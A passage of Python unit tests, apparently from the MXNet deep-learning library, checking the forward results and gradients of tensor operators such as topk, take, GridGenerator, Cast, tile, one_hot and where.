val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_context(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
